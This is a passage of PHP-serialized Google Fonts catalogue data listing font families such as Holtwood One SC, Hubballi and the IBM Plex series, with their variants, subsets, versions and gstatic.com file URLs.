http://fonts.gstatic.com/s/hindvadodara/v12/neIQzCKvrIcn5pbuuuriV9tTSCnwiXM0oSOL2Yw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:512;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Holtwood One SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/holtwoodonesc/v16/yYLx0hLR0P-3vMFSk1TCq3Txg5B3cbb6LZttyg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:513;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Homemade Apple\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/homemadeapple/v18/Qw3EZQFXECDrI2q789EKQZJob3x9Vnksi4M7.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:514;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Homenaje\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/homenaje/v16/FwZY7-Q-xVAi_l-6Ld6A4sijpFu_.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:515;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Hubballi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:7:\"kannada\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/hubballi/v4/o-0JIpUj3WIZ1RFN56B7yBBNYuSF.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:516;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Hurricane\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v5\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/hurricane/v5/pe0sMIuULZxTolZ5YldyAv2-C99ycg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:517;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"IBM Plex Mono\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"100\";s:85:\"http://fonts.gstatic.com/s/ibmplexmono/v12/-F6pfjptAgt5VM-kVkqdyU8n3kwq0n1hj-sNFQ.ttf\";s:9:\"100italic\";s:87:\"http://fonts.gstatic.com/s/ibmplexmono/v12/-F6rfjptAgt5VM-kVkqdyU8n1ioStndlre4dFcFh.ttf\";s:3:\"200\";s:86:\"http://fonts.gstatic.com/s/ibmplexmono/v12/-F6qfjptAgt5VM-kVkqdyU8n3uAL8ldPg-IUDNg.ttf\";s:9:\"200italic\";s:89:\"http://fonts.gstatic.com/s/ibmplexmono/v12/-F6sfjptAgt5VM-kVkqdyU8n1ioSGlZFh8ARHNh4zg.ttf\";s:3:\"300\";s:86:\"http://fonts.gstatic.com/s/ibmplexmono/v12/-F6qfjptAgt5VM-kVkqdyU8n3oQI8ldPg-IUDNg.ttf\";s:9:\"300italic\";s:89:\"http://fonts.gstatic.com/s/ibmplexmono/v12/-F6sfjptAgt5VM-kVkqdyU8n1ioSflVFh8ARHNh4zg.ttf\";s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/ibmplexmono/v12/-F63fjptAgt5VM-kVkqdyU8n5igg1l9kn-s.ttf\";s:6:\"italic\";s:85:\"http://fonts.gstatic.com/s/ibmplexmono/v12/-F6pfjptAgt5VM-kVkqdyU8n1ioq0n1hj-sNFQ.ttf\";s:3:\"500\";s:86:\"http://fonts.gstatic.com/s/ibmplexmono/v12/-F6qfjptAgt5VM-kVkqdyU8n3twJ8ldPg-IUDNg.ttf\";s:9:\"500italic\";s:89:\"http://fonts.gstatic.com/s/ibmplexmono/v12/-F6sfjptAgt5VM-kVkqdyU8n1ioSJlRFh8ARHNh4zg.ttf\";s:3:\"600\";s:86:\"http://fonts.gstatic.com/s/ibmplexmono/v12/-F6qfjptAgt5VM-kVkqdyU8n3vAO8ldPg-IUDNg.ttf\";s:9:\"600italic\";s:89:\"http://fonts.gstatic.com/s/ibmplexmono/v12/-F6sfjptAgt5VM-kVkqdyU8n1ioSClNFh8ARHNh4zg.ttf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/ibmplexmono/v12/-F6qfjptAgt5VM-kVkqdyU8n3pQP8ldPg-IUDNg.ttf\";s:9:\"700italic\";s:89:\"http://fonts.gstatic.com/s/ibmplexmono/v12/-F6sfjptAgt5VM-kVkqdyU8n1ioSblJFh8ARHNh4zg.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:518;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"IBM Plex Sans\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";i:5;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"100\";s:85:\"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX-KVElMYYaJe8bpLHnCwDKjbLeEKxIedbzDw.ttf\";s:9:\"100italic\";s:87:\"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX8KVElMYYaJe8bpLHnCwDKhdTmdKZMW9PjD3N8.ttf\";s:3:\"200\";s:86:\"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX9KVElMYYaJe8bpLHnCwDKjR7_MIZmdd_qFmo.ttf\";s:9:\"200italic\";s:89:\"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX7KVElMYYaJe8bpLHnCwDKhdTm2Idscf3vBmpl8A.ttf\";s:3:\"300\";s:86:\"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX9KVElMYYaJe8bpLHnCwDKjXr8MIZmdd_qFmo.ttf\";s:9:\"300italic\";s:89:\"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX7KVElMYYaJe8bpLHnCwDKhdTmvIRscf3vBmpl8A.ttf\";s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/ibmplexsans/v14/zYXgKVElMYYaJe8bpLHnCwDKtdbUFI5NadY.ttf\";s:6:\"italic\";s:85:\"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX-KVElMYYaJe8bpLHnCwDKhdTeEKxIedbzDw.ttf\";s:3:\"500\";s:86:\"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX9KVElMYYaJe8bpLHnCwDKjSL9MIZmdd_qFmo.ttf\";s:9:\"500italic\";s:89:\"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX7KVElMYYaJe8bpLHnCwDKhdTm5IVscf3vBmpl8A.ttf\";s:3:\"600\";s:86:\"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX9KVElMYYaJe8bpLHnCwDKjQ76MIZmdd_qFmo.ttf\";s:9:\"600italic\";s:89:\"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX7KVElMYYaJe8bpLHnCwDKhdTmyIJscf3vBmpl8A.ttf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX9KVElMYYaJe8bpLHnCwDKjWr7MIZmdd_qFmo.ttf\";s:9:\"700italic\";s:89:\"http://fonts.gstatic.com/s/ibmplexsans/v14/zYX7KVElMYYaJe8bpLHnCwDKhdTmrINscf3vBmpl8A.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:519;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"IBM Plex Sans Arabic\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:6:\"arabic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"100\";s:99:\"http://fonts.gstatic.com/s/ibmplexsansarabic/v7/Qw3MZRtWPQCuHme67tEYUIx3Kh0PHR9N6YNe3PC5eMlAMg0.ttf\";s:3:\"200\";s:100:\"http://fonts.gstatic.com/s/ibmplexsansarabic/v7/Qw3NZRtWPQCuHme67tEYUIx3Kh0PHR9N6YPy_dCTVsVJKxTs.ttf\";s:3:\"300\";s:100:\"http://fonts.gstatic.com/s/ibmplexsansarabic/v7/Qw3NZRtWPQCuHme67tEYUIx3Kh0PHR9N6YOW_tCTVsVJKxTs.ttf\";s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/ibmplexsansarabic/v7/Qw3CZRtWPQCuHme67tEYUIx3Kh0PHR9N6bs61vSbfdlA.ttf\";s:3:\"500\";s:100:\"http://fonts.gstatic.com/s/ibmplexsansarabic/v7/Qw3NZRtWPQCuHme67tEYUIx3Kh0PHR9N6YPO_9CTVsVJKxTs.ttf\";s:3:\"600\";s:100:\"http://fonts.gstatic.com/s/ibmplexsansarabic/v7/Qw3NZRtWPQCuHme67tEYUIx3Kh0PHR9N6YPi-NCTVsVJKxTs.ttf\";s:3:\"700\";s:100:\"http://fonts.gstatic.com/s/ibmplexsansarabic/v7/Qw3NZRtWPQCuHme67tEYUIx3Kh0PHR9N6YOG-dCTVsVJKxTs.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:520;O:8:\"stdClass\":8:{s:6:\"family\";s:23:\"IBM Plex Sans Condensed\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";}s:7:\"subsets\";a:4:{i:0;s:12:\"cyrillic-ext\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"100\";s:107:\"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8nN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY7KyKvBgYsMDhM.ttf\";s:9:\"100italic\";s:110:\"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8hN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8M_LhakJHhOgBg.ttf\";s:3:\"200\";s:108:\"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY5m6Yvrr4cFFwq5.ttf\";s:9:\"200italic\";s:111:\"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8iN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8GPqpYMnEhq5H1w.ttf\";s:3:\"300\";s:108:\"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY4C6ovrr4cFFwq5.ttf\";s:9:\"300italic\";s:111:\"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8iN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8AfppYMnEhq5H1w.ttf\";s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8lN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHbauwq_jhJsM.ttf\";s:6:\"italic\";s:107:\"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8nN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYasyKvBgYsMDhM.ttf\";s:3:\"500\";s:108:\"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY5a64vrr4cFFwq5.ttf\";s:9:\"500italic\";s:111:\"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8iN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8F_opYMnEhq5H1w.ttf\";s:3:\"600\";s:108:\"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY527Ivrr4cFFwq5.ttf\";s:9:\"600italic\";s:111:\"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8iN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8HPvpYMnEhq5H1w.ttf\";s:3:\"700\";s:108:\"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8gN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHY4S7Yvrr4cFFwq5.ttf\";s:9:\"700italic\";s:111:\"http://fonts.gstatic.com/s/ibmplexsanscondensed/v13/Gg8iN4UfRSqiPg7Jn2ZI12V4DCEwkj1E4LVeHYas8BfupYMnEhq5H1w.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:521;O:8:\"stdClass\":8:{s:6:\"family\";s:24:\"IBM Plex Sans Devanagari\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:12:\"cyrillic-ext\";i:1;s:10:\"devanagari\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"100\";s:108:\"http://fonts.gstatic.com/s/ibmplexsansdevanagari/v7/XRXB3JCMvG4IDoS9SubXB6W-UX5iehIMBFR2-O_HMUjwUcjwCEQq.ttf\";s:3:\"200\";s:110:\"http://fonts.gstatic.com/s/ibmplexsansdevanagari/v7/XRXA3JCMvG4IDoS9SubXB6W-UX5iehIMBFR2-O_HnWnQe-b8AV0z0w.ttf\";s:3:\"300\";s:110:\"http://fonts.gstatic.com/s/ibmplexsansdevanagari/v7/XRXA3JCMvG4IDoS9SubXB6W-UX5iehIMBFR2-O_H-WrQe-b8AV0z0w.ttf\";s:7:\"regular\";s:106:\"http://fonts.gstatic.com/s/ibmplexsansdevanagari/v7/XRXH3JCMvG4IDoS9SubXB6W-UX5iehIMBFR2-O__VUL0c83gCA.ttf\";s:3:\"500\";s:110:\"http://fonts.gstatic.com/s/ibmplexsansdevanagari/v7/XRXA3JCMvG4IDoS9SubXB6W-UX5iehIMBFR2-O_HoWvQe-b8AV0z0w.ttf\";s:3:\"600\";s:110:\"http://fonts.gstatic.com/s/ibmplexsansdevanagari/v7/XRXA3JCMvG4IDoS9SubXB6W-UX5iehIMBFR2-O_HjWzQe-b8AV0z0w.ttf\";s:3:\"700\";s:110:\"http://fonts.gstatic.com/s/ibmplexsansdevanagari/v7/XRXA3JCMvG4IDoS9SubXB6W-UX5iehIMBFR2-O_H6W3Qe-b8AV0z0w.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:522;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"IBM Plex Sans Hebrew\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:12:\"cyrillic-ext\";i:1;s:6:\"hebrew\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"100\";s:99:\"http://fonts.gstatic.com/s/ibmplexsanshebrew/v8/BCa4qYENg9Kw1mpLpO0bGM5lfHAAZHhDXEXB-l0VqDaM7C4.ttf\";s:3:\"200\";s:100:\"http://fonts.gstatic.com/s/ibmplexsanshebrew/v8/BCa5qYENg9Kw1mpLpO0bGM5lfHAAZHhDXEVt230_hjqF9Tc2.ttf\";s:3:\"300\";s:100:\"http://fonts.gstatic.com/s/ibmplexsanshebrew/v8/BCa5qYENg9Kw1mpLpO0bGM5lfHAAZHhDXEUJ2H0_hjqF9Tc2.ttf\";s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/ibmplexsanshebrew/v8/BCa2qYENg9Kw1mpLpO0bGM5lfHAAZHhDXH2l8Fk3rSaM.ttf\";s:3:\"500\";s:100:\"http://fonts.gstatic.com/s/ibmplexsanshebrew/v8/BCa5qYENg9Kw1mpLpO0bGM5lfHAAZHhDXEVR2X0_hjqF9Tc2.ttf\";s:3:\"600\";s:100:\"http://fonts.gstatic.com/s/ibmplexsanshebrew/v8/BCa5qYENg9Kw1mpLpO0bGM5lfHAAZHhDXEV93n0_hjqF9Tc2.ttf\";s:3:\"700\";s:100:\"http://fonts.gstatic.com/s/ibmplexsanshebrew/v8/BCa5qYENg9Kw1mpLpO0bGM5lfHAAZHhDXEUZ330_hjqF9Tc2.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:523;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"IBM Plex Sans KR\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"100\";s:90:\"http://fonts.gstatic.com/s/ibmplexsanskr/v7/vEFM2-VJISZe3O_rc3ZVYh4aTwNOyra_X5zCpMrMfA.ttf\";s:3:\"200\";s:91:\"http://fonts.gstatic.com/s/ibmplexsanskr/v7/vEFN2-VJISZe3O_rc3ZVYh4aTwNOyhqef7bsqMPVZb4.ttf\";s:3:\"300\";s:91:\"http://fonts.gstatic.com/s/ibmplexsanskr/v7/vEFN2-VJISZe3O_rc3ZVYh4aTwNOyn6df7bsqMPVZb4.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/ibmplexsanskr/v7/vEFK2-VJISZe3O_rc3ZVYh4aTwNO8tK1W77HtMo.ttf\";s:3:\"500\";s:91:\"http://fonts.gstatic.com/s/ibmplexsanskr/v7/vEFN2-VJISZe3O_rc3ZVYh4aTwNOyiacf7bsqMPVZb4.ttf\";s:3:\"600\";s:91:\"http://fonts.gstatic.com/s/ibmplexsanskr/v7/vEFN2-VJISZe3O_rc3ZVYh4aTwNOygqbf7bsqMPVZb4.ttf\";s:3:\"700\";s:91:\"http://fonts.gstatic.com/s/ibmplexsanskr/v7/vEFN2-VJISZe3O_rc3ZVYh4aTwNOym6af7bsqMPVZb4.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:524;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"IBM Plex Sans Thai\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:12:\"cyrillic-ext\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:4:\"thai\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"100\";s:94:\"http://fonts.gstatic.com/s/ibmplexsansthai/v7/m8JNje1VVIzcq1HzJq2AEdo2Tj_qvLqEatYlR8ZKUqcX.ttf\";s:3:\"200\";s:96:\"http://fonts.gstatic.com/s/ibmplexsansthai/v7/m8JMje1VVIzcq1HzJq2AEdo2Tj_qvLqExvcFbehGW74OXw.ttf\";s:3:\"300\";s:96:\"http://fonts.gstatic.com/s/ibmplexsansthai/v7/m8JMje1VVIzcq1HzJq2AEdo2Tj_qvLqEovQFbehGW74OXw.ttf\";s:7:\"regular\";s:92:\"http://fonts.gstatic.com/s/ibmplexsansthai/v7/m8JPje1VVIzcq1HzJq2AEdo2Tj_qvLq8DtwhZcNaUg.ttf\";s:3:\"500\";s:96:\"http://fonts.gstatic.com/s/ibmplexsansthai/v7/m8JMje1VVIzcq1HzJq2AEdo2Tj_qvLqE-vUFbehGW74OXw.ttf\";s:3:\"600\";s:96:\"http://fonts.gstatic.com/s/ibmplexsansthai/v7/m8JMje1VVIzcq1HzJq2AEdo2Tj_qvLqE1vIFbehGW74OXw.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/ibmplexsansthai/v7/m8JMje1VVIzcq1HzJq2AEdo2Tj_qvLqEsvMFbehGW74OXw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:525;O:8:\"stdClass\":8:{s:6:\"family\";s:25:\"IBM Plex Sans Thai Looped\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:12:\"cyrillic-ext\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:4:\"thai\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":7:{s:3:\"100\";s:110:\"http://fonts.gstatic.com/s/ibmplexsansthailooped/v7/tss5AoJJRAhL3BTrK3r2xxbFhvKfyBB6l7hHT30L_HaKpHOtFCQ76Q.ttf\";s:3:\"200\";s:111:\"http://fonts.gstatic.com/s/ibmplexsansthailooped/v7/tss6AoJJRAhL3BTrK3r2xxbFhvKfyBB6l7hHT30L_NqrhFmDGC0i8Cc.ttf\";s:3:\"300\";s:111:\"http://fonts.gstatic.com/s/ibmplexsansthailooped/v7/tss6AoJJRAhL3BTrK3r2xxbFhvKfyBB6l7hHT30L_L6ohFmDGC0i8Cc.ttf\";s:7:\"regular\";s:107:\"http://fonts.gstatic.com/s/ibmplexsansthailooped/v7/tss_AoJJRAhL3BTrK3r2xxbFhvKfyBB6l7hHT30LxBKAoFGoBCQ.ttf\";s:3:\"500\";s:111:\"http://fonts.gstatic.com/s/ibmplexsansthailooped/v7/tss6AoJJRAhL3BTrK3r2xxbFhvKfyBB6l7hHT30L_OaphFmDGC0i8Cc.ttf\";s:3:\"600\";s:111:\"http://fonts.gstatic.com/s/ibmplexsansthailooped/v7/tss6AoJJRAhL3BTrK3r2xxbFhvKfyBB6l7hHT30L_MquhFmDGC0i8Cc.ttf\";s:3:\"700\";s:111:\"http://fonts.gstatic.com/s/ibmplexsansthailooped/v7/tss6AoJJRAhL3BTrK3r2xxbFhvKfyBB6l7hHT30L_K6vhFmDGC0i8Cc.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:526;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"IBM Plex Serif\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"100\";s:87:\"http://fonts.gstatic.com/s/ibmplexserif/v15/jizBREVNn1dOx-zrZ2X3pZvkTi182zIZj1bIkNo.ttf\";s:9:\"100italic\";s:90:\"http://fonts.gstatic.com/s/ibmplexserif/v15/jizHREVNn1dOx-zrZ2X3pZvkTiUa41YTi3TNgNq55w.ttf\";s:3:\"200\";s:88:\"http://fonts.gstatic.com/s/ibmplexserif/v15/jizAREVNn1dOx-zrZ2X3pZvkTi3Q-hIzoVrBicOg.ttf\";s:9:\"200italic\";s:91:\"http://fonts.gstatic.com/s/ibmplexserif/v15/jizGREVNn1dOx-zrZ2X3pZvkTiUa4_oyq17jjNOg_oc.ttf\";s:3:\"300\";s:88:\"http://fonts.gstatic.com/s/ibmplexserif/v15/jizAREVNn1dOx-zrZ2X3pZvkTi20-RIzoVrBicOg.ttf\";s:9:\"300italic\";s:91:\"http://fonts.gstatic.com/s/ibmplexserif/v15/jizGREVNn1dOx-zrZ2X3pZvkTiUa454xq17jjNOg_oc.ttf\";s:7:\"regular\";s:84:\"http://fonts.gstatic.com/s/ibmplexserif/v15/jizDREVNn1dOx-zrZ2X3pZvkThUY0TY7ikbI.ttf\";s:6:\"italic\";s:87:\"http://fonts.gstatic.com/s/ibmplexserif/v15/jizBREVNn1dOx-zrZ2X3pZvkTiUa2zIZj1bIkNo.ttf\";s:3:\"500\";s:88:\"http://fonts.gstatic.com/s/ibmplexserif/v15/jizAREVNn1dOx-zrZ2X3pZvkTi3s-BIzoVrBicOg.ttf\";s:9:\"500italic\";s:91:\"http://fonts.gstatic.com/s/ibmplexserif/v15/jizGREVNn1dOx-zrZ2X3pZvkTiUa48Ywq17jjNOg_oc.ttf\";s:3:\"600\";s:88:\"http://fonts.gstatic.com/s/ibmplexserif/v15/jizAREVNn1dOx-zrZ2X3pZvkTi3A_xIzoVrBicOg.ttf\";s:9:\"600italic\";s:91:\"http://fonts.gstatic.com/s/ibmplexserif/v15/jizGREVNn1dOx-zrZ2X3pZvkTiUa4-o3q17jjNOg_oc.ttf\";s:3:\"700\";s:88:\"http://fonts.gstatic.com/s/ibmplexserif/v15/jizAREVNn1dOx-zrZ2X3pZvkTi2k_hIzoVrBicOg.ttf\";s:9:\"700italic\";s:91:\"http://fonts.gstatic.com/s/ibmplexserif/v15/jizGREVNn1dOx-zrZ2X3pZvkTiUa4442q17jjNOg_oc.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:527;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"IM Fell DW 